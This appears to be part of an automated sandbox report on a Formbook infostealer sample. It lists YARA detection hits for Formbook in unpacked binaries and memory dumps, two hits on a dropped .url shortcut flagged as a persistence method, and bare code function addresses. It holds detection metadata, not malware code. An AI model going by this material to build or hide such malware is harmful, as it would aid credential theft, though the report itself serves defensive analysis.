          Source: 20.0.logagent.exe.72480000.3.raw.unpack, type: UNPACKEDPEMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 20.0.logagent.exe.72480000.3.raw.unpack, type: UNPACKEDPEMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 5.0.DpiScaling.exe.72480000.3.raw.unpack, type: UNPACKEDPEMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 5.0.DpiScaling.exe.72480000.3.raw.unpack, type: UNPACKEDPEMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 20.0.logagent.exe.72480000.1.unpack, type: UNPACKEDPEMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 20.0.logagent.exe.72480000.1.unpack, type: UNPACKEDPEMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 15.0.DpiScaling.exe.72480000.1.raw.unpack, type: UNPACKEDPEMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 15.0.DpiScaling.exe.72480000.1.raw.unpack, type: UNPACKEDPEMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 15.0.DpiScaling.exe.72480000.0.raw.unpack, type: UNPACKEDPEMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 15.0.DpiScaling.exe.72480000.0.raw.unpack, type: UNPACKEDPEMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 15.0.DpiScaling.exe.72480000.3.raw.unpack, type: UNPACKEDPEMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 15.0.DpiScaling.exe.72480000.3.raw.unpack, type: UNPACKEDPEMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 20.0.logagent.exe.72480000.3.unpack, type: UNPACKEDPEMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 20.0.logagent.exe.72480000.3.unpack, type: UNPACKEDPEMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 20.2.logagent.exe.72480000.2.raw.unpack, type: UNPACKEDPEMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 20.2.logagent.exe.72480000.2.raw.unpack, type: UNPACKEDPEMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 20.0.logagent.exe.72480000.0.raw.unpack, type: UNPACKEDPEMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 20.0.logagent.exe.72480000.0.raw.unpack, type: UNPACKEDPEMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 15.0.DpiScaling.exe.72480000.3.unpack, type: UNPACKEDPEMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 15.0.DpiScaling.exe.72480000.3.unpack, type: UNPACKEDPEMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 15.2.DpiScaling.exe.72480000.3.raw.unpack, type: UNPACKEDPEMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 15.2.DpiScaling.exe.72480000.3.raw.unpack, type: UNPACKEDPEMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 20.0.logagent.exe.72480000.1.raw.unpack, type: UNPACKEDPEMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 20.0.logagent.exe.72480000.1.raw.unpack, type: UNPACKEDPEMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 5.0.DpiScaling.exe.72480000.2.unpack, type: UNPACKEDPEMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 5.0.DpiScaling.exe.72480000.2.unpack, type: UNPACKEDPEMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 15.2.DpiScaling.exe.72480000.3.unpack, type: UNPACKEDPEMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 15.2.DpiScaling.exe.72480000.3.unpack, type: UNPACKEDPEMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 20.2.logagent.exe.72480000.2.unpack, type: UNPACKEDPEMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 20.2.logagent.exe.72480000.2.unpack, type: UNPACKEDPEMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 5.2.DpiScaling.exe.72480000.4.unpack, type: UNPACKEDPEMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 5.2.DpiScaling.exe.72480000.4.unpack, type: UNPACKEDPEMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 0000000F.00000000.810820140.0000000072480000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 0000000F.00000000.810820140.0000000072480000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000010.00000002.980408969.0000000002C60000.00000004.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000010.00000002.980408969.0000000002C60000.00000004.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000005.00000002.826394913.0000000004B90000.00000040.00020000.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000005.00000002.826394913.0000000004B90000.00000040.00020000.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000006.00000000.772008503.000000000E9DF000.00000040.00020000.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000006.00000000.772008503.000000000E9DF000.00000040.00020000.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000005.00000000.714097353.0000000072480000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000005.00000000.714097353.0000000072480000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000010.00000002.979059154.0000000000800000.00000040.00020000.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000010.00000002.979059154.0000000000800000.00000040.00020000.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000006.00000000.749509351.000000000E9DF000.00000040.00020000.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000006.00000000.749509351.000000000E9DF000.00000040.00020000.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000014.00000000.836253520.0000000072480000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000014.00000000.836253520.0000000072480000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 0000000F.00000002.860879140.0000000000E90000.00000040.00020000.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 0000000F.00000002.860879140.0000000000E90000.00000040.00020000.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 0000000F.00000000.810315428.0000000072480000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 0000000F.00000000.810315428.0000000072480000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 0000000F.00000002.864516356.0000000072480000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 0000000F.00000002.864516356.0000000072480000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 0000000F.00000000.811363392.0000000072480000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 0000000F.00000000.811363392.0000000072480000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000005.00000000.714755943.0000000072480000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000005.00000000.714755943.0000000072480000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 0000000F.00000002.860188435.0000000000E60000.00000040.00020000.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 0000000F.00000002.860188435.0000000000E60000.00000040.00020000.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000014.00000002.844946988.0000000072480000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000014.00000002.844946988.0000000072480000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000005.00000000.714442633.0000000072480000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000005.00000000.714442633.0000000072480000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000010.00000002.980367511.0000000002C30000.00000040.00020000.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000010.00000002.980367511.0000000002C30000.00000040.00020000.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 0000000F.00000000.811926457.0000000072480000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 0000000F.00000000.811926457.0000000072480000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000005.00000000.713760138.0000000072480000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000005.00000000.713760138.0000000072480000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000005.00000002.826540547.0000000004BF0000.00000040.00020000.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000005.00000002.826540547.0000000004BF0000.00000040.00020000.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000005.00000002.830080872.0000000072480000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000005.00000002.830080872.0000000072480000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000014.00000000.835723366.0000000072480000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000014.00000000.835723366.0000000072480000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000016.00000002.863247728.0000000003280000.00000040.00020000.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000016.00000002.863247728.0000000003280000.00000040.00020000.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000014.00000000.836796283.0000000072480000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000014.00000000.836796283.0000000072480000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000014.00000000.837305764.0000000072480000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000014.00000000.837305764.0000000072480000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: C:\Users\user\Contacts\cynnekhsjA.url, type: DROPPEDMatched rule: Methodology_Shortcut_HotKey author = @itsreallynick (Nick Carr), description = Detects possible shortcut usage for .URL persistence, reference = https://twitter.com/cglyer/status/1176184798248919044, score = 27.09.2019
          Source: C:\Users\user\Contacts\cynnekhsjA.url, type: DROPPEDMatched rule: Methodology_Contains_Shortcut_OtherURIhandlers author = @itsreallynick (Nick Carr), description = Detects possible shortcut usage for .URL persistence, reference = https://twitter.com/cglyer/status/1176184798248919044, score = 27.09.2019
          Source: C:\Windows\SysWOW64\DpiScaling.exeCode function: 5_2_05022D07
          Source: C:\Windows\SysWOW64\DpiScaling.exeCode function: 5_2_05021D55
          Source: C:\Windows\SysWOW64\DpiScaling.exeCode function: 5_2_050225DD
          Source: C:\Windows\SysWOW64\DpiScaling.exeCode function: 5_2_04F6841F
          Source: C:\Windows\SysWOW64\DpiScaling.exeCode function: 5_2_04F6D5E0
          Source: C:\Windows\SysWOW64\DpiScaling.exeCode function: 5_2_0501D466
          Source: C:\Windows\SysWOW64\DpiScaling.exeCode function: 5_2_04F82581
          Source: C:\Windows\SysWOW64\DpiScaling.exeCode function: 5_2_04F50D20
          Source: C:\Windows\SysWOW64\DpiScaling.exeCode function: 5_2_04F76E30
          Source: C:\Windows\SysWOW64\DpiScaling.exeCode function: 5_2_0502DFCE
          Source: C:\Windows\SysWOW64\DpiScaling.exeCode function: 5_2_05021FF1
          Source: C:\Windows\SysWOW64\DpiScaling.exeCode function: 5_2_0501D616
          Source: C:\Windows\SysWOW64\DpiScaling.exeCode function: 5_2_05022EF7
          Source: C:\Windows\SysWOW64\DpiScaling.exeCode function: 5_2_04F820A0
          Source: C:\Windows\SysWOW64\DpiScaling.exeCode function: 5_2_04F6B090
          Source: C:\Windows\SysWOW64\DpiScaling.exeCode function: 5_2_04F7A830
          Source: C:\Windows\SysWOW64\DpiScaling.exeCode function: 5_2_05011002
          Source: C:\Windows\SysWOW64\DpiScaling.exeCode function: 5_2_0502E824
          Source: C:\Windows\SysWOW64\DpiScaling.exeCode function: 5_2_050220A8
          Source: C:\Windows\SysWOW64\DpiScaling.exeCode function: 5_2_04F74120
          Source: C:\Windows\SysWOW64\DpiScaling.exeCode function: 5_2_050228EC
          Source: C:\Windows\SysWOW64\DpiScaling.exeCode function: 5_2_04F5F900
